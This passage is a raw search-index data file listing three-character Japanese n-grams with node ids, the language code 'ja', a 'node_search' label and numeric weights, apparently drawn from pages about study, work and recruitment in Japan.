('した愛', 162, 'ja', 'node_search', 1),
('した日', 169, 'ja', 'node_search', 0.830633),
('した日', 176, 'ja', 'node_search', 0.842342),
('した服', 87, 'ja', 'node_search', 0.913226),
('した毎', 175, 'ja', 'node_search', 0.889397),
('した毎', 177, 'ja', 'node_search', 0.808176),
('した生', 135, 'ja', 'node_search', 1),
('した生', 167, 'ja', 'node_search', 0.972861),
('した第', 140, 'ja', 'node_search', 19),
('した茨', 163, 'ja', 'node_search', 1),
('してい', 1, 'ja', 'node_search', 1),
('してい', 5, 'ja', 'node_search', 1.60953),
('してい', 8, 'ja', 'node_search', 2),
('してい', 10, 'ja', 'node_search', 3),
('してい', 18, 'ja', 'node_search', 0.961087),
('してい', 23, 'ja', 'node_search', 0.951776),
('してい', 24, 'ja', 'node_search', 1.36123),
('してい', 27, 'ja', 'node_search', 0.374963),
('してい', 80, 'ja', 'node_search', 1),
('してい', 113, 'ja', 'node_search', 1),
('してい', 116, 'ja', 'node_search', 1),
('してい', 133, 'ja', 'node_search', 0.699655),
('してい', 135, 'ja', 'node_search', 3.08346),
('してい', 136, 'ja', 'node_search', 1.64694),
('してい', 138, 'ja', 'node_search', 1.73841),
('してい', 140, 'ja', 'node_search', 0.779231),
('してい', 142, 'ja', 'node_search', 0.866793),
('してい', 155, 'ja', 'node_search', 0.691597),
('してお', 23, 'ja', 'node_search', 0.652202),
('してお', 24, 'ja', 'node_search', 1.95521),
('してお', 26, 'ja', 'node_search', 2),
('してお', 27, 'ja', 'node_search', 0.779625),
('してお', 135, 'ja', 'node_search', 1),
('してお', 163, 'ja', 'node_search', 1),
('してお', 182, 'ja', 'node_search', 0.845322),
('してお', 183, 'ja', 'node_search', 0.776703),
('してお', 188, 'ja', 'node_search', 0.854391),
('してお', 197, 'ja', 'node_search', 0.808176),
('してき', 27, 'ja', 'node_search', 0.403258),
('してく', 28, 'ja', 'node_search', 3),
('してく', 69, 'ja', 'node_search', 1),
('してく', 77, 'ja', 'node_search', 8),
('してく', 87, 'ja', 'node_search', 1),
('してく', 120, 'ja', 'node_search', 1),
('してご', 154, 'ja', 'node_search', 0.896076),
('してご', 156, 'ja', 'node_search', 1),
('してご', 157, 'ja', 'node_search', 1),
('してご', 191, 'ja', 'node_search', 1),
('しての', 80, 'ja', 'node_search', 1),
('しての', 170, 'ja', 'node_search', 0.830633),
('しては', 23, 'ja', 'node_search', 0.453319),
('してま', 154, 'ja', 'node_search', 0.797402),
('してま', 164, 'ja', 'node_search', 0.76188),
('してま', 165, 'ja', 'node_search', 0.759465),
('してま', 167, 'ja', 'node_search', 0.827757),
('してま', 173, 'ja', 'node_search', 0.771698),
('してま', 174, 'ja', 'node_search', 0.731649),
('してま', 175, 'ja', 'node_search', 0.779231),
('してま', 176, 'ja', 'node_search', 0.749958),
('してま', 186, 'ja', 'node_search', 0.848323),
('しても', 87, 'ja', 'node_search', 1),
('してサ', 138, 'ja', 'node_search', 0.672252),
('してフ', 5, 'ja', 'node_search', 0.857458),
('して与', 7, 'ja', 'node_search', 1.8861),
('して人', 189, 'ja', 'node_search', 1),
('して使', 23, 'ja', 'node_search', 0.906287),
('して働', 5, 'ja', 'node_search', 3),
('して働', 8, 'ja', 'node_search', 27),
('して十', 194, 'ja', 'node_search', 0.972861),
('して十', 197, 'ja', 'node_search', 0.96498),
('して協', 69, 'ja', 'node_search', 1),
('して参', 23, 'ja', 'node_search', 0.413458),
('して参', 25, 'ja', 'node_search', 1),
('して学', 135, 'ja', 'node_search', 0.920273),
('して学', 182, 'ja', 'node_search', 1),
('して将', 195, 'ja', 'node_search', 1),
('して心', 133, 'ja', 'node_search', 0.813674),
('して支', 160, 'ja', 'node_search', 0.774192),
('して日', 147, 'ja', 'node_search', 7),
('して日', 154, 'ja', 'node_search', 1),
('して日', 164, 'ja', 'node_search', 1.75231),
('して日', 165, 'ja', 'node_search', 1.74996),
('して日', 166, 'ja', 'node_search', 1),
('して日', 167, 'ja', 'node_search', 1.81645),
('して日', 169, 'ja', 'node_search', 1.78691),
('して日', 171, 'ja', 'node_search', 1.77419),
('して日', 173, 'ja', 'node_search', 1.76188),
('して日', 174, 'ja', 'node_search', 1.7185),
('して日', 175, 'ja', 'node_search', 1.76431),
('して日', 176, 'ja', 'node_search', 1.74069),
('して日', 177, 'ja', 'node_search', 1.71),
('して日', 184, 'ja', 'node_search', 1.75707),
('して日', 186, 'ja', 'node_search', 1),
('して日', 192, 'ja', 'node_search', 1),
('して準', 193, 'ja', 'node_search', 1),
('して設', 27, 'ja', 'node_search', 0.336188),
('して迅', 6, 'ja', 'node_search', 3),
('して面', 98, 'ja', 'node_search', 1),
('しと指', 120, 'ja', 'node_search', 1),
('しなが', 140, 'ja', 'node_search', 0.989021),
('しなが', 163, 'ja', 'node_search', 1),
('しなが', 195, 'ja', 'node_search', 1),
('しなく', 62, 'ja', 'node_search', 0.513597),
('しまし', 9, 'ja', 'node_search', 3),
('しまし', 17, 'ja', 'node_search', 4),
('しまし', 23, 'ja', 'node_search', 1),
('しまし', 24, 'ja', 'node_search', 0.449147),
('しまし', 27, 'ja', 'node_search', 0.315677),
('しまし', 28, 'ja', 'node_search', 3),
('しまし', 29, 'ja', 'node_search', 3),
('しまし', 81, 'ja', 'node_search', 1),
('しまし', 87, 'ja', 'node_search', 4.11622),
('しまし', 100, 'ja', 'node_search', 1),
('しまし', 107, 'ja', 'node_search', 1),
('しまし', 109, 'ja', 'node_search', 1),
('しまし', 112, 'ja', 'node_search', 1),
('しまし', 114, 'ja', 'node_search', 1),
('しまし', 115, 'ja', 'node_search', 1),
('しまし', 117, 'ja', 'node_search', 1),
('しまし', 121, 'ja', 'node_search', 1),
('しまし', 123, 'ja', 'node_search', 1),
('しまし', 125, 'ja', 'node_search', 1),
('しまし', 131, 'ja', 'node_search', 1),
('しまし', 132, 'ja', 'node_search', 1),
('しまし', 133, 'ja', 'node_search', 1.91323),
('しまし', 134, 'ja', 'node_search', 1),
('しまし', 137, 'ja', 'node_search', 1),
('しまし', 139, 'ja', 'node_search', 1),
('しまし', 141, 'ja', 'node_search', 1),
('しまし', 143, 'ja', 'node_search', 1),
('しまし', 154, 'ja', 'node_search', 0.776703),
('しまし', 156, 'ja', 'node_search', 28.9384),
('しまし', 157, 'ja', 'node_search', 3.83353),
('します', 3, 'ja', 'node_search', 2.84),
('します', 7, 'ja', 'node_search', 1.77549),
('します', 18, 'ja', 'node_search', 1),
('します', 62, 'ja', 'node_search', 5.60086),
('します', 69, 'ja', 'node_search', 1),
('します', 78, 'ja', 'node_search', 1),
('します', 80, 'ja', 'node_search', 1),
('します', 111, 'ja', 'node_search', 1),
('します', 126, 'ja', 'node_search', 1),
('します', 136, 'ja', 'node_search', 1.51085),
('します', 140, 'ja', 'node_search', 1),
('します', 142, 'ja', 'node_search', 0.630018),
('します', 154, 'ja', 'node_search', 1),
('します', 155, 'ja', 'node_search', 1),
('します', 160, 'ja', 'node_search', 1.83938),
('します', 161, 'ja', 'node_search', 1.8861),
('します', 162, 'ja', 'node_search', 1.64006),
('します', 163, 'ja', 'node_search', 0.657549),
('します', 164, 'ja', 'node_search', 1),
('します', 165, 'ja', 'node_search', 1),
('します', 166, 'ja', 'node_search', 1.86679),
('します', 167, 'ja', 'node_search', 1),
('します', 168, 'ja', 'node_search', 1.86995),
('します', 169, 'ja', 'node_search', 1),
('します', 170, 'ja', 'node_search', 1.87957),
('します', 171, 'ja', 'node_search', 1),
('します', 173, 'ja', 'node_search', 1),
('します', 174, 'ja', 'node_search', 1),
('します', 175, 'ja', 'node_search', 1),
('します', 176, 'ja', 'node_search', 1),
('します', 177, 'ja', 'node_search', 1),
('します', 178, 'ja', 'node_search', 1),
('します', 179, 'ja', 'node_search', 1.73614),
('します', 180, 'ja', 'node_search', 1.80007),
('します', 181, 'ja', 'node_search', 1.80275),
('します', 182, 'ja', 'node_search', 1),
('します', 183, 'ja', 'node_search', 1),
('します', 184, 'ja', 'node_search', 1),
('します', 185, 'ja', 'node_search', 1),
('します', 186, 'ja', 'node_search', 1.76922),
('します', 187, 'ja', 'node_search', 1),
('します', 188, 'ja', 'node_search', 1.76188),
('します', 189, 'ja', 'node_search', 1),
('します', 190, 'ja', 'node_search', 1),
('します', 191, 'ja', 'node_search', 1.80818),
('します', 192, 'ja', 'node_search', 1.77923),
('します', 193, 'ja', 'node_search', 1.79475),
('します', 194, 'ja', 'node_search', 1),
('します', 195, 'ja', 'node_search', 1),
('します', 196, 'ja', 'node_search', 1.7974),
('します', 197, 'ja', 'node_search', 1),
('します', 198, 'ja', 'node_search', 1.78178),
('します', 199, 'ja', 'node_search', 1),
('しみい', 1, 'ja', 'node_search', 1),
('しめる', 62, 'ja', 'node_search', 0.529288),
('しょう', 3, 'ja', 'node_search', 1.49891),
('しょう', 62, 'ja', 'node_search', 1.47543),
('しょう', 87, 'ja', 'node_search', 6.08754),
('し上げ', 133, 'ja', 'node_search', 0.792123),
('し上げ', 154, 'ja', 'node_search', 1),
('し上げ', 156, 'ja', 'node_search', 0.96498),
('し上げ', 157, 'ja', 'node_search', 0.851346),
('し上げ', 160, 'ja', 'node_search', 0.909743),
('し上げ', 161, 'ja', 'node_search', 0.96498),
('し上げ', 164, 'ja', 'node_search', 0.938382),
('し上げ', 166, 'ja', 'node_search', 0.949597),
('し上げ', 168, 'ja', 'node_search', 0.953396),
('し上げ', 169, 'ja', 'node_search', 0.800068),
('し上げ', 170, 'ja', 'node_search', 0.96498),
('し上げ', 171, 'ja', 'node_search', 0.786915),
('し上げ', 176, 'ja', 'node_search', 0.808176),
('し上げ', 177, 'ja', 'node_search', 0.72066),
('し上げ', 178, 'ja', 'node_search', 0.78951),
('し上げ', 179, 'ja', 'node_search', 0.784336),
('し上げ', 180, 'ja', 'node_search', 0.866793),
('し上げ', 181, 'ja', 'node_search', 0.869951),
('し上げ', 185, 'ja', 'node_search', 0.824901),
('し上げ', 186, 'ja', 'node_search', 0.813674),
('し上げ', 188, 'ja', 'node_search', 0.822065),
('し上げ', 189, 'ja', 'node_search', 0.839384),
('し上げ', 191, 'ja', 'node_search', 0.876337),
('し上げ', 192, 'ja', 'node_search', 0.839384),
('し上げ', 193, 'ja', 'node_search', 0.857458),
('し上げ', 195, 'ja', 'node_search', 0.813674),
('し上げ', 196, 'ja', 'node_search', 0.863659),
('し上げ', 198, 'ja', 'node_search', 0.839384),
('し上げ', 199, 'ja', 'node_search', 0.839384),
('し引い', 8, 'ja', 'node_search', 2),
('し引か', 8, 'ja', 'node_search', 2),
('し活躍', 195, 'ja', 'node_search', 0.989021),
('し続け', 80, 'ja', 'node_search', 1),
('し続け', 116, 'ja', 'node_search', 1),
('し話し', 5, 'ja', 'node_search', 0.759465),
('し韓国', 3, 'ja', 'node_search', 0.526987),
('じてく', 120, 'ja', 'node_search', 1),
('じて今', 181, 'ja', 'node_search', 1),
('じて学', 142, 'ja', 'node_search', 0.945829),
('じて必', 142, 'ja', 'node_search', 0.722831),
('じて採', 156, 'ja', 'node_search', 1.94583),
('じて採', 157, 'ja', 'node_search', 1.83645),
('じて経', 138, 'ja', 'node_search', 1),
('じられ', 120, 'ja', 'node_search', 0.938382),
('じスキ', 24, 'ja', 'node_search', 0.424201),
('すぐ登', 62, 'ja', 'node_search', 0.490769),
('すこと', 30, 'ja', 'node_search', 1.84234),
('すすめ', 155, 'ja', 'node_search', 0.76431),
('すでに', 28, 'ja', 'node_search', 1),
('すので', 69, 'ja', 'node_search', 0.927431),
('すべき', 3, 'ja', 'node_search', 43),
('すべき', 98, 'ja', 'node_search', 1),
('すべて', 69, 'ja', 'node_search', 1),
('すべて', 122, 'ja', 'node_search', 1),
('すべて', 136, 'ja', 'node_search', 0.976851),
('すべて', 140, 'ja', 'node_search', 1),
('すます', 183, 'ja', 'node_search', 0.816452),
('すめで', 155, 'ja', 'node_search', 0.76188),
('すよう', 69, 'ja', 'node_search', 1),
('するこ', 3, 'ja', 'node_search', 1.04197),
('するこ', 23, 'ja', 'node_search', 0.418401),
('するこ', 68, 'ja', 'node_search', 1),
('するこ', 98, 'ja', 'node_search', 2),
('するこ', 122, 'ja', 'node_search', 2),
('するこ', 135, 'ja', 'node_search', 1.6916),
('するこ', 136, 'ja', 'node_search', 1.55861),
('するこ', 138, 'ja', 'node_search', 0.661163),
('するた', 1, 'ja', 'node_search', 0.961087),
('するた', 23, 'ja', 'node_search', 0.442633),
('するた', 24, 'ja', 'node_search', 0.45586),
('するた', 136, 'ja', 'node_search', 0.876337),
('するた', 138, 'ja', 'node_search', 0.833529),
('するた', 192, 'ja', 'node_search', 0.976851),
('するだ', 138, 'ja', 'node_search', 0.980874),
('するだ', 182, 'ja', 'node_search', 1),
('するだ', 183, 'ja', 'node_search', 1),
('すると', 142, 'ja', 'node_search', 0.842342),
('すると', 165, 'ja', 'node_search', 0.886095),
('すると', 188, 'ja', 'node_search', 1),
('すると', 195, 'ja', 'node_search', 0.882818),
('するの', 135, 'ja', 'node_search', 0.805455),
('するま', 23, 'ja', 'node_search', 0.774192),
('するト', 24, 'ja', 'node_search', 0.373259),
('するビ', 7, 'ja', 'node_search', 3.75712),
('するル', 3, 'ja', 'node_search', 0.541108),
('する予', 142, 'ja', 'node_search', 0.920273),
('する事', 23, 'ja', 'node_search', 0.839384),
('する事', 24, 'ja', 'node_search', 0.670377),
('する先', 62, 'ja', 'node_search', 0.980874),
('する前', 142, 'ja', 'node_search', 0.757065),
('する可', 138, 'ja', 'node_search', 0.703756),
('する学', 10, 'ja', 'node_search', 1),
('する少', 138, 'ja', 'node_search', 0.771698),
('する必', 3, 'ja', 'node_search', 1),
('する必', 98, 'ja', 'node_search', 1),
('する方', 7, 'ja', 'node_search', 1.8861),
('する方', 162, 'ja', 'node_search', 0.681785),
('する機', 150, 'ja', 'node_search', 1),
('する海', 3, 'ja', 'node_search', 0.550958),
('する準', 140, 'ja', 'node_search', 1),
('する特', 7, 'ja', 'node_search', 28.8861),
('する研', 150, 'ja', 'node_search', 19),
('する私', 122, 'ja', 'node_search', 0.927431),
('する第', 95, 'ja', 'node_search', 1),
('する能', 27, 'ja', 'node_search', 0.423467),
('する証', 62, 'ja', 'node_search', 0.664818),
('する語', 3, 'ja', 'node_search', 0.805455),
('する資', 27, 'ja', 'node_search', 0.313293),
('する重', 181, 'ja', 'node_search', 0.993146),
('する間', 3, 'ja', 'node_search', 1),
('する際', 133, 'ja', 'node_search', 1),
('する魅', 185, 'ja', 'node_search', 0.906287),
('す介護', 162, 'ja', 'node_search', 1),
('す活躍', 183, 'ja', 'node_search', 0.810915),
('ずに韓', 23, 'ja', 'node_search', 0.615536),
('せいた', 161, 'ja', 'node_search', 1),
('せいた', 166, 'ja', 'node_search', 1),
('せいた', 168, 'ja', 'node_search', 1),
('せいた', 170, 'ja', 'node_search', 1),
('せいた', 178, 'ja', 'node_search', 1),
('せいた', 180, 'ja', 'node_search', 1),
('せいた', 181, 'ja', 'node_search', 1),
('せいた', 182, 'ja', 'node_search', 1),
('せいた', 183, 'ja', 'node_search', 1),
('せいた', 185, 'ja', 'node_search', 1),
('せいた', 186, 'ja', 'node_search', 1),
('せいた', 187, 'ja', 'node_search', 1),
('せいた', 188, 'ja', 'node_search', 1),
('せいた', 189, 'ja', 'node_search', 1),
('せいた', 190, 'ja', 'node_search', 1),
('せいた', 191, 'ja', 'node_search', 1),
('せいた', 192, 'ja', 'node_search', 1),
('せいた', 193, 'ja', 'node_search', 1),
('せいた', 194, 'ja', 'node_search', 1),
('せいた', 195, 'ja', 'node_search', 1),
('せいた', 196, 'ja', 'node_search', 1),
('せいた', 197, 'ja', 'node_search', 1),
('せいた', 198, 'ja', 'node_search', 1),
('せいた', 199, 'ja', 'node_search', 1),
('せかけ', 135, 'ja', 'node_search', 1),
('せくだ', 1, 'ja', 'node_search', 1),
('せくだ', 155, 'ja', 'node_search', 0.638366),
('せくだ', 162, 'ja', 'node_search', 0.617112),
('せくだ', 163, 'ja', 'node_search', 0.618696),
('せてい', 27, 'ja', 'node_search', 0.905121),
('せなが', 80, 'ja', 'node_search', 1),
('せます', 87, 'ja', 'node_search', 0.816452),
('ぜなら', 3, 'ja', 'node_search', 1),
('そして', 23, 'ja', 'node_search', 1),
('そして', 98, 'ja', 'node_search', 1),
('そして', 156, 'ja', 'node_search', 1),
('そして', 157, 'ja', 'node_search', 1),
('そして', 166, 'ja', 'node_search', 1),
('そして', 186, 'ja', 'node_search', 1),
('そして', 189, 'ja', 'node_search', 1),
('そして', 191, 'ja', 'node_search', 1),
('そして', 192, 'ja', 'node_search', 1),
('そして', 193, 'ja', 'node_search', 1),
('そして', 194, 'ja', 'node_search', 0.976851),
('そして', 195, 'ja', 'node_search', 1),
('そして', 197, 'ja', 'node_search', 0.968904),
('そのた', 3, 'ja', 'node_search', 0.558589),
('そのよ', 189, 'ja', 'node_search', 0.949597),
('その中', 23, 'ja', 'node_search', 1),
('その分', 10, 'ja', 'node_search', 2),
('その期', 3, 'ja', 'node_search', 0.591395),
('その積', 191, 'ja', 'node_search', 1),
('それぞ', 24, 'ja', 'node_search', 1),
('それぞ', 136, 'ja', 'node_search', 0.949597),
('それぞ', 173, 'ja', 'node_search', 0.909743),
('それを', 87, 'ja', 'node_search', 0.578643),
('それ以', 10, 'ja', 'node_search', 1),
('ぞれの', 24, 'ja', 'node_search', 0.993146),
('ぞれの', 136, 'ja', 'node_search', 0.942091),
('ぞれの', 173, 'ja', 'node_search', 0.902857),
('たいと', 3, 'ja', 'node_search', 0.906287),
('たいと', 189, 'ja', 'node_search', 2),
('たいの', 3, 'ja', 'node_search', 1),
('たいミ', 24, 'ja', 'node_search', 1),
('たい人', 5, 'ja', 'node_search', 3),
('たい人', 8, 'ja', 'node_search', 2),
('たい人', 23, 'ja', 'node_search', 0.59873),
('たい学', 24, 'ja', 'node_search', 0.565115),
('たい方', 24, 'ja', 'node_search', 1.13505),
('たい方', 28, 'ja', 'node_search', 3),
('たい方', 62, 'ja', 'node_search', 4),
('たい方', 163, 'ja', 'node_search', 1),
('たい生', 26, 'ja', 'node_search', 1),
('たい経', 10, 'ja', 'node_search', 3),
('たおか', 120, 'ja', 'node_search', 1),
('たがす', 98, 'ja', 'node_search', 1),
('たこと', 154, 'ja', 'node_search', 1),
('たこと', 160, 'ja', 'node_search', 1),
('たこと', 161, 'ja', 'node_search', 1),
('たこと', 164, 'ja', 'node_search', 1),
('たこと', 165, 'ja', 'node_search', 1),
('たこと', 166, 'ja', 'node_search', 1),
('たこと', 167, 'ja', 'node_search', 1),
('たこと', 168, 'ja', 'node_search', 1),
('たこと', 169, 'ja', 'node_search', 1),
('たこと', 170, 'ja', 'node_search', 1),
('たこと', 171, 'ja', 'node_search', 1),
('たこと', 173, 'ja', 'node_search', 1),
('たこと', 174, 'ja', 'node_search', 1),
('たこと', 175, 'ja', 'node_search', 1),
('たこと', 176, 'ja', 'node_search', 1),
('たこと', 177, 'ja', 'node_search', 1),
('たこと', 178, 'ja', 'node_search', 1),
('たこと', 180, 'ja', 'node_search', 1),
('たこと', 181, 'ja', 'node_search', 1),
('たこと', 182, 'ja', 'node_search', 1),
('たこと', 183, 'ja', 'node_search', 1),
('たこと', 184, 'ja', 'node_search', 1),
('たこと', 185, 'ja', 'node_search', 1),
('たこと', 186, 'ja', 'node_search', 1),
('たこと', 187, 'ja', 'node_search', 1),
('たこと', 188, 'ja', 'node_search', 1),
('たこと', 189, 'ja', 'node_search', 1.90286),
('たこと', 190, 'ja', 'node_search', 1),
('たこと', 191, 'ja', 'node_search', 1),
('たこと', 192, 'ja', 'node_search', 1),
('たこと', 193, 'ja', 'node_search', 1),
('たこと', 194, 'ja', 'node_search', 1),
('たこと', 195, 'ja', 'node_search', 1),
('たこと', 196, 'ja', 'node_search', 1),
('たこと', 197, 'ja', 'node_search', 1),
('たこと', 198, 'ja', 'node_search', 1),
('たこと', 199, 'ja', 'node_search', 1),
('たしま', 27, 'ja', 'node_search', 0.316078),
('たしま', 154, 'ja', 'node_search', 1),
('たしま', 155, 'ja', 'node_search', 1),
('たしま', 156, 'ja', 'node_search', 1.93838),
('たしま', 157, 'ja', 'node_search', 1.83353),
('たしま', 160, 'ja', 'node_search', 1.83938),
('たしま', 161, 'ja', 'node_search', 1.8861),
('たしま', 162, 'ja', 'node_search', 1.64006),
('たしま', 163, 'ja', 'node_search', 0.659351),
('たしま', 164, 'ja', 'node_search', 1),
('たしま', 165, 'ja', 'node_search', 1),
('たしま', 166, 'ja', 'node_search', 1.86679),
('たしま', 167, 'ja', 'node_search', 1),
('たしま', 168, 'ja', 'node_search', 1.86995),
('たしま', 169, 'ja', 'node_search', 1),
('たしま', 170, 'ja', 'node_search', 1.87957),
('たしま', 171, 'ja', 'node_search', 1),
('たしま', 173, 'ja', 'node_search', 1),
('たしま', 174, 'ja', 'node_search', 1),
('たしま', 175, 'ja', 'node_search', 1),
('たしま', 176, 'ja', 'node_search', 1),
('たしま', 177, 'ja', 'node_search', 1),
('たしま', 178, 'ja', 'node_search', 1),
('たしま', 179, 'ja', 'node_search', 1.73614),
('たしま', 180, 'ja', 'node_search', 1.80007),
('たしま', 181, 'ja', 'node_search', 1.80275),
('たしま', 182, 'ja', 'node_search', 1),
('たしま', 183, 'ja', 'node_search', 1),
('たしま', 184, 'ja', 'node_search', 1),
('たしま', 185, 'ja', 'node_search', 1),
('たしま', 186, 'ja', 'node_search', 1.76922),
('たしま', 187, 'ja', 'node_search', 1),
('たしま', 188, 'ja', 'node_search', 1.76188),
('たしま', 189, 'ja', 'node_search', 1),
('たしま', 190, 'ja', 'node_search', 1),
('たしま', 191, 'ja', 'node_search', 1.80818),
('たしま', 192, 'ja', 'node_search', 1.77923),
('たしま', 193, 'ja', 'node_search', 1.79475),
('たしま', 194, 'ja', 'node_search', 1),
('たしま', 195, 'ja', 'node_search', 1),
('たしま', 196, 'ja', 'node_search', 1.7974),
('たしま', 197, 'ja', 'node_search', 1),
('たしま', 198, 'ja', 'node_search', 1.78178),
('たしま', 199, 'ja', 'node_search', 1),
('たすべ', 140, 'ja', 'node_search', 1),
('ただき', 1, 'ja', 'node_search', 2),
('ただき', 24, 'ja', 'node_search', 1),
('ただき', 27, 'ja', 'node_search', 0.901867),
('ただき', 135, 'ja', 'node_search', 0.668514),
('ただく', 5, 'ja', 'node_search', 0.961087),
('ただけ', 27, 'ja', 'node_search', 0.305608),
('ただし', 3, 'ja', 'node_search', 0.839384),
('たちが', 9, 'ja', 'node_search', 3),
('たちが', 17, 'ja', 'node_search', 4),
('たちが', 23, 'ja', 'node_search', 0.509287),
('たちに', 23, 'ja', 'node_search', 0.594307),
('たちに', 69, 'ja', 'node_search', 1),
('たちに', 135, 'ja', 'node_search', 0.892724),
('たちの', 23, 'ja', 'node_search', 0.566439),
('たちの', 27, 'ja', 'node_search', 0.374394),
('たちの', 62, 'ja', 'node_search', 4),
('たちの', 95, 'ja', 'node_search', 1),
('たちの', 136, 'ja', 'node_search', 1),
('たちの', 138, 'ja', 'node_search', 0.731649),
('たちの', 157, 'ja', 'node_search', 1),
('たちは', 1, 'ja', 'node_search', 1),
('たちは', 27, 'ja', 'node_search', 0.40128),
('たちは', 28, 'ja', 'node_search', 1),
('たちは', 80, 'ja', 'node_search', 1),
('たちは', 140, 'ja', 'node_search', 1),
('たちを', 69, 'ja', 'node_search', 1),
('たって', 150, 'ja', 'node_search', 1),
('たなキ', 164, 'ja', 'node_search', 1),
('たなキ', 167, 'ja', 'node_search', 1),
('たなキ', 169, 'ja', 'node_search', 1),
('たなキ', 171, 'ja', 'node_search', 1),
('たなキ', 173, 'ja', 'node_search', 27.9769),
('たなキ', 174, 'ja', 'node_search', 1),
('たなキ', 175, 'ja', 'node_search', 1),
('たなキ', 176, 'ja', 'node_search', 1),
('たなキ', 177, 'ja', 'node_search', 1),
('たなキ', 180, 'ja', 'node_search', 0.989021),
('たなキ', 184, 'ja', 'node_search', 0.927431),
('たなキ', 186, 'ja', 'node_search', 1),
('たなキ', 189, 'ja', 'node_search', 0.808176),
('たなキ', 196, 'ja', 'node_search', 0.942091),
('たなス', 164, 'ja', 'node_search', 4),
('たなス', 174, 'ja', 'node_search', 27),
('たなチ', 187, 'ja', 'node_search', 1),
('たな一', 177, 'ja', 'node_search', 27),
('たな可', 183, 'ja', 'node_search', 27),
('たな可', 191, 'ja', 'node_search', 0.942091),
('たな可', 197, 'ja', 'node_search', 1),
('たな挑', 165, 'ja', 'node_search', 0.923838),
('たな挑', 169, 'ja', 'node_search', 4),
('たな挑', 175, 'ja', 'node_search', 27),
('たな挑', 178, 'ja', 'node_search', 0.909743),
('たな挑', 185, 'ja', 'node_search', 0.800068),
('たな挑', 188, 'ja', 'node_search', 0.792123),
('たな活', 126, 'ja', 'node_search', 1),
('たの成', 62, 'ja', 'node_search', 0.677939),
('たの言', 62, 'ja', 'node_search', 0.961087),
('たはそ', 10, 'ja', 'node_search', 1),
('たはア', 18, 'ja', 'node_search', 28),
('たは揺', 120, 'ja', 'node_search', 1),
('たびの', 161, 'ja', 'node_search', 1),
('ために', 1, 'ja', 'node_search', 0.953396),
('ために', 6, 'ja', 'node_search', 6),
('ために', 24, 'ja', 'node_search', 1.01404),
('ために', 87, 'ja', 'node_search', 0.618696),
('ために', 95, 'ja', 'node_search', 19),
('ために', 98, 'ja', 'node_search', 1),
('ために', 136, 'ja', 'node_search', 0.677939),
('ために', 138, 'ja', 'node_search', 0.827757),
('ために', 142, 'ja', 'node_search', 0.993146),
('ために', 184, 'ja', 'node_search', 1),
('ための', 3, 'ja', 'node_search', 0.693594),
('ための', 5, 'ja', 'node_search', 3),
('ための', 7, 'ja', 'node_search', 3.8861),
('ための', 19, 'ja', 'node_search', 3),
('ための', 23, 'ja', 'node_search', 0.441034),
('ための', 24, 'ja', 'node_search', 0.79886),
('ための', 27, 'ja', 'node_search', 0.76188),
('ための', 136, 'ja', 'node_search', 0.869951),
('ための', 137, 'ja', 'node_search', 1),
('ための', 139, 'ja', 'node_search', 1),
('ための', 143, 'ja', 'node_search', 1),
('ための', 178, 'ja', 'node_search', 1),
('ための', 187, 'ja', 'node_search', 1),
('ための', 192, 'ja', 'node_search', 0.968904),
('ための', 194, 'ja', 'node_search', 1),
('たもの', 164, 'ja', 'node_search', 0.879565),
('たもの', 171, 'ja', 'node_search', 0.879565),
('たもの', 174, 'ja', 'node_search', 0.857458),
('たもの', 189, 'ja', 'node_search', 0.781775),
('たもの', 199, 'ja', 'node_search', 0.927431),
('たりに', 135, 'ja', 'node_search', 0.813674),
('たる準', 165, 'ja', 'node_search', 1),
('たれた', 24, 'ja', 'node_search', 0.636679),
('たを待', 62, 'ja', 'node_search', 0.909743),
('たを日', 69, 'ja', 'node_search', 0.957226),
('たカイ', 126, 'ja', 'node_search', 1),
('たキャ', 163, 'ja', 'node_search', 1),
('たキャ', 168, 'ja', 'node_search', 0.830633),
('たキャ', 170, 'ja', 'node_search', 0.813674),
('たコー', 62, 'ja', 'node_search', 4),
('たニュ', 133, 'ja', 'node_search', 0.729424),
('たモチ', 120, 'ja', 'node_search', 0.976851),
('た仕事', 23, 'ja', 'node_search', 0.491762),
('た仕事', 184, 'ja', 'node_search', 0.816452),
('た他の', 24, 'ja', 'node_search', 0.347512),
('た候補', 156, 'ja', 'node_search', 1.94583),
('た候補', 157, 'ja', 'node_search', 1.83353),
('た努力', 184, 'ja', 'node_search', 0.96498),
('た名だ', 62, 'ja', 'node_search', 1),
('た基準', 24, 'ja', 'node_search', 0.470829),
('た基準', 26, 'ja', 'node_search', 1),
('た外食', 133, 'ja', 'node_search', 0.976851),
('た大き', 160, 'ja', 'node_search', 1),
('た大き', 168, 'ja', 'node_search', 1),
('た大き', 170, 'ja', 'node_search', 1),
('た大き', 180, 'ja', 'node_search', 1),
('た大き', 196, 'ja', 'node_search', 1),
('た大き', 199, 'ja', 'node_search', 1),
('た大切', 182, 'ja', 'node_search', 0.949597),
('た大切', 185, 'ja', 'node_search', 1),
('た大切', 188, 'ja', 'node_search', 1),
('た大切', 191, 'ja', 'node_search', 0.972861),
('た大切', 193, 'ja', 'node_search', 1),
('た大切', 198, 'ja', 'node_search', 1),
('た姉妹', 69, 'ja', 'node_search', 1),
('た学生', 23, 'ja', 'node_search', 0.45586),
('た学生', 24, 'ja', 'node_search', 0.63333),
('た学生', 133, 'ja', 'node_search', 0.769219),
('た学生', 136, 'ja', 'node_search', 2),
('た実習', 140, 'ja', 'node_search', 1),
('た強い', 192, 'ja', 'node_search', 1),
('た愛知', 162, 'ja', 'node_search', 1),
('た成果', 165, 'ja', 'node_search', 0.961087),
('た扉を', 62, 'ja', 'node_search', 0.480114),
('た日本', 169, 'ja', 'node_search', 0.827757),
('た日本', 176, 'ja', 'node_search', 0.839384),
('た月収', 163, 'ja', 'node_search', 0.830633),
('た服装', 87, 'ja', 'node_search', 0.909743),
('た業務', 30, 'ja', 'node_search', 1.84234),
('た毎日', 175, 'ja', 'node_search', 0.886095),
('た毎日', 177, 'ja', 'node_search', 0.805455),
('た民族', 23, 'ja', 'node_search', 0.625114),
('た準備', 179, 'ja', 'node_search', 1),
('た準備', 186, 'ja', 'node_search', 1),
('た準備', 195, 'ja', 'node_search', 1),
('た熱意', 166, 'ja', 'node_search', 1),
('た生徒', 135, 'ja', 'node_search', 1),
('た生活', 167, 'ja', 'node_search', 0.968904),
('た研修', 24, 'ja', 'node_search', 1),
('た結果', 182, 'ja', 'node_search', 1),
('た結果', 183, 'ja', 'node_search', 1),
('た茨城', 163, 'ja', 'node_search', 1),
('た資機', 27, 'ja', 'node_search', 0.566439),
('だきま', 27, 'ja', 'node_search', 0.900792),
('だく必', 5, 'ja', 'node_search', 0.957226),
('だけで', 5, 'ja', 'node_search', 0.745294),
